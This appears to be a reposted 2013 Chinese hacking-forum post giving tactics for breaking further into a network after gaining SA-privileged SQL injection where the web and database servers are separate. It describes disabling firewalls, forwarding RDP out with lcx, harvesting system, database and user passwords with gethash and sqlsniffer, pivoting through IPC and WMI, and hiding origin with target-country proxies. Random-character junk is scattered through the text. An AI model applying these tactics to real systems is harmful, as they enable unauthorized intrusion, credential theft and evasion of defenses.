中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]
作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
9 p2 b/ E1 M4 A2 i5 \9 s
* e% @5 \' o, ]3 z5 N$ b7 u/ A& m" h: T$ L1 E8 B+ l' V

( F/ ]6 ?9 t% T) dSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)$ ?2 R+ z2 B, i0 D. V* }1 G) L
, F0 X: V8 g: Z% y6 ^% A; g

8 j: W  W/ i1 w2 ^$ T! {! Y$ u一、DB机有公网IP.
  {) S5 d: G! v3 X, v. _8 O9 n' Z* s: _$ B: u
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
+ ?) @; y0 G) q! O# z  L& k
$ g- x3 i. ^- P8 e' K* n9 w) U+ u9 K
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
$ r7 [8 ~6 s9 H7 ]) ?, g( y$ a+ N. D* }4 v$ l2 I( i0 v5 u
! y- C5 q- _' y) ^% }8 E: P: l- g% j
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com3 Z6 z5 ^, i+ X! D; W: a$ U7 K

0 o; Z! A% F4 Z5 }/ ^" F2 O( }5 K1 i7 L! I, w- Z
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.% w" h! ^7 n: G0 Q7 j
4 d9 z7 K& D% Y+ ]. V! J

6 O6 G* w9 n' I- W
; B1 P# ?7 r* ?- {8 V4 \; G二、DB机只有内网IP
: c( S! O2 h! P2 Z5 e# W9 o" s5 C+ k4 Q$ U" ^- J
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.: f, w# d* E5 z4 y; U

/ s5 m/ f* H( M
9 V8 p: A- o) j2:停掉防火墙和IP策略再从内往外扫描.
( O8 Z* t  F+ f3 a* n2 v; I' O
1 A( L. X! _' l+ n, X8 D# V$ F4 Z, [( _# ?1 I$ h" t
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.  U0 n/ n0 C! r6 R/ x

" [  d: z5 V! e- K6 A- l. [  O) L9 ]* r; |
4:学会密码规律分析往往会有惊喜.
; D$ j7 s9 X& Q% {7 a  K/ o. H/ P1 n3 H; [
7 i9 j6 l4 c- O, v* H9 v
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
4 R$ B9 F, S9 ~4 J( h5 b% ?2 H+ ]* E& r% N, m" z
+ o& @6 b9 p  u; R5 C' e
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2